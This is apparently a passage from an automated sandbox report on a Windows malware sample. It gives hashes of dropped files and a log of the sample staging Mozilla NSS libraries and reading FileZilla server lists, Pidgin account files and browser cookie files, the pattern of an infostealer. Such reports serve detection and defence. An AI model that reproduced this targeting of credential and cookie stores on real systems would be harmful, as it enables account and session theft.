SHA256: c381401ea96dfe9b926126dcbbc0dd6ab541dbf549732cc6c66f20096b1f663e
SSDeep: 24:LLijhJ0KL7G0TMJHUyyJtmCm0u6lOKQAE9V8FsffDVOzeCmly6UwcTa/HMQW:wz+JH3yJUhJCVE9V8FsXhFlNU1Ts3W 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\1286381410344337375584.tmp 7.00 KB MD5: 0111897c22e2ab86bfd65ccf91adc717
SHA1: c499d8febec0f0cb771a654fc65699c22226fe37
SHA256: cff896f26e26cdf1a63e312f89795366ee2bc902323cabe44a86aa4ad0977228
SSDeep: 48:tNecVTgPOpEveoJZFrU10WB58PdJAKr1EcO:tVSNDX25E 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp 512.00 KB MD5: ca84b062330bf89c92f6da9fbd818b9e
SHA1: f52fd559629cecf4a02037663c6d9bf171ac7235
SHA256: 3ce8414a491044fca9d5c4de1af15fc54c06ba021a7ba2199e092f35c42fbdf4
SSDeep: 48:DML4nwTqMXQ98wM6ckr3ekPokj+rU+D0KHhS0wy:Dbn39e8DdPHaB33 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\128700944028049442936.tmp-shm 32.00 KB MD5: b7c14ec6110fa820ca6b65f5aec85911
SHA1: 608eeb7488042453c9ca40f7e1398fc1a270f3f4
SHA256: fd4c9fda9cd3f9ae7c962b0ddf37232294d55580e1aa165aa06129b8549389eb
SSDeep: 3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\1287786455599953165632.tmp 68.00 KB MD5: 3067eb8025ae0262c7a5c681d7982d67
SHA1: 534976f915f2dd49adcf09677f9d38a0d0cfee63
SHA256: 9260dd9c2b2253e0a886f4d66e22c561d23604fe0010bbac8240f8fdc3aaf945
SSDeep: 96:byNQIoYnMvqyWx7pnqH+w/fVIrECuKdPraBdUDBBVWqwmKT/WTPepeWbtxYB+tCX:blkMvuzzTP6btWutle 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\1288564556688256449469.tmp 100.00 KB MD5: 3c72a569901a8a45018d9d7c542a1857
SHA1: 9bb7a9a87b5a8b7c4c556b8271d4af0373911389
SHA256: 06bb2bfe3a0612482499e0b0f175b85b66c9f4d32e6b700d740ea801ea9c764e
SSDeep: 96:rZLJLdogEU+08l50etKCpjjJwCJA+ETzgcc+8EyZ/cCzwwC+AbIN0NAm:tJdogD+0O5rKC5ti5yDe 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-private-l1-1-0.dll 71.30 KB MD5: 9910a1bfdc41c5b39f6af37f0a22aacd
SHA1: 47fa76778556f34a5e7910c816c78835109e4050
SHA256: 65ded8d2ce159b2f5569f55b2caf0e2c90f3694bd88c89de790a15a49d8386b9
SSDeep: 1536:VAHEGlVDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPFZo6kt:Vc7De5c4bFE2Jy2cvxXWpD9d3334BkZj 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-process-l1-1-0.dll 18.80 KB MD5: 8d02dd4c29bd490e672d271700511371
SHA1: f3035a756e2e963764912c6b432e74615ae07011
SHA256: c03124ba691b187917ba79078c66e12cbf5387a3741203070ba23980aa471e8b
SSDeep: 192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nssdbm3.dll 90.45 KB MD5: 569a7a65658a46f9412bdfa04f86e2b2
SHA1: 44cc0038e891ae73c43b61a71a46c97f98b1030d
SHA256: 541a293c450e609810279f121a5e9dfa4e924d52e8b0c6c543512b5026efe7ec
SSDeep: 1536:5vNGVOt0VjOJkbH8femxfRVMNKBDuOQWL1421GlkxERC+ANcFZoZ/6tNRCwI41ZH:hNGVOiBZbcGmxXMcBqmzoCUZoZebHZMw 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/softokn3.dll 140.95 KB MD5: 67827db2380b5848166a411bae9f0632
SHA1: f68f1096c5a3f7b90824aa0f7b9da372228363ff
SHA256: 9a7f11c212d61856dfc494de111911b7a6d9d5e9795b0b70bbbc998896f068ae
SSDeep: 3072:zAf6suip+z7FEk/oJz69sFaXeu9CoT2nIZvetBWqIBoE9Mv:Q6PpsF4CoT2EeY2eMv 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/ucrtbase.dll 1.09 MB MD5: d6326267ae77655f312d2287903db4d3
SHA1: 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f
SHA256: 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9
SSDeep: 24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb 		False
...
Host Behavior
COM (1)
»
Operation Class Interface Additional Information Success Count Logfile
Create 3C374A40-BAE4-11CF-BF7D-00AA006946EE 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER True 1
Fn
File (577)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-datetime-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-debug-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-errorhandling-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-2-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l2-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-handle-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-heap-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-interlocked-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-libraryloader-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-localization-l1-2-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-memory-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-namedpipe-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processenvironment-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-1.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-profile-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-rtlsupport-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-string-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-2-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-sysinfo-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-timezone-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-util-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-conio-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-convert-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-environment-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-filesystem-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-heap-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-locale-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-math-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-multibyte-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-private-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-process-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-runtime-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-stdio-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-string-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-time-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-utility-l1-1-0.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/freebl3.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/mozglue.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/msvcp140.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nss3.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nssdbm3.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/softokn3.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/ucrtbase.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/vcruntime140.dll desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\filezilla\recentservers.xml desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\.purple\accounts.xml desired_access = GENERIC_READ, file_attributes = INVALID_FILE_ATTRIBUTES, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE False 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@dpm.demdex[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@everesttech[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@google[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@ml314[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\\5p5nrgjn0js_halpmcxz@rlcdn[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adformdsp[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adform[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adnxs[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtech[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@adtr02[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@advertising[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@api.bing[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@at.atwola[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[3].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@google[4].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@linkedin[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@m.exactag[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@msn[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@skadtec[1].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@track.adform[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\Windows\Cookies\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_ARCHIVE, FILE_ATTRIBUTE_NOT_CONTENT_INDEXED, share_mode = FILE_SHARE_READ True 1
Fn
